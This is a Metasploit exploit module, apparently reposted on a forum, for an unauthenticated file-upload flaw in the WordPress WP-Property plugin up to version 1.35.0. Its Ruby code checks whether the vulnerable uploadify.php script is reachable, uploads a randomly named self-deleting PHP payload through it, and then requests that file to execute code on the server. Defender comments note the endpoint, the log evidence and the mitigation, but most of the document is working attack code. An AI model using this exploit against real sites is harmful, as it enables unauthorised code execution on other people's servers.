WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/exploit/php_exe'

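# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (the description below states versions <= 1.35.0).
#
# Notes for defenders reading this listing:
# * The only endpoint touched is
#   wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#   under the WordPress base path: first a multipart POST carrying the form
#   fields "Filedata" and "folder", then a GET for the uploaded file.
# * The uploaded file name is five random letters followed by ".php".
# * The payload is requested with :unlink_self => true, so the file is
#   presumably gone from disk after it has run; web-server access logs are
#   the more durable evidence.
# * Mitigation is to update the plugin past the affected range and to remove
#   or block direct access to the bundled uploadify.php script.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # The forum paste had mangled this constant (its ":P" was swallowed as an
  # emoticon); PhpEXE is the mixin that provides get_write_exec_payload.
  include Msf::Exploit::PhpEXE

  # Registers the module metadata and the TARGETURI option.
  #
  # @param info [Hash] metadata overrides passed in by the framework
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the bundled uploadify.php script with a single GET.
  #
  # A 200 response only shows that the script is reachable; nothing here
  # inspects the plugin version or the script's behaviour, which is why the
  # strongest result returned is Appears rather than Vulnerable.
  #
  # @return [Exploit::CheckCode] Unknown when there is no response or a
  #   non-200 status, Appears otherwise
  def check
    # Work on a copy so the trailing slash is not appended to the string
    # that target_uri hands out.
    uri = target_uri.path.dup
    uri << '/' unless uri.end_with?('/')

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    return Exploit::CheckCode::Unknown if !res || res.code != 200

    Exploit::CheckCode::Appears
  end

  # Uploads the generated PHP payload through uploadify.php and requests it.
  #
  # The upload is accepted as successful only when the server answers 200
  # and echoes the generated file name in the response body; that body is
  # then used verbatim as the URI of the second request.
  #
  # @return [void]
  def exploit
    uri = target_uri.path.dup
    uri << '/' unless uri.end_with?('/')

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Two form-data parts: the file itself and the destination folder.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drops the CRLF that the serialised message puts before a boundary at
    # the start of a line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if !res || res.code != 200 || res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end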
不要问我这写的是什么、怎么利用,我是说 msf。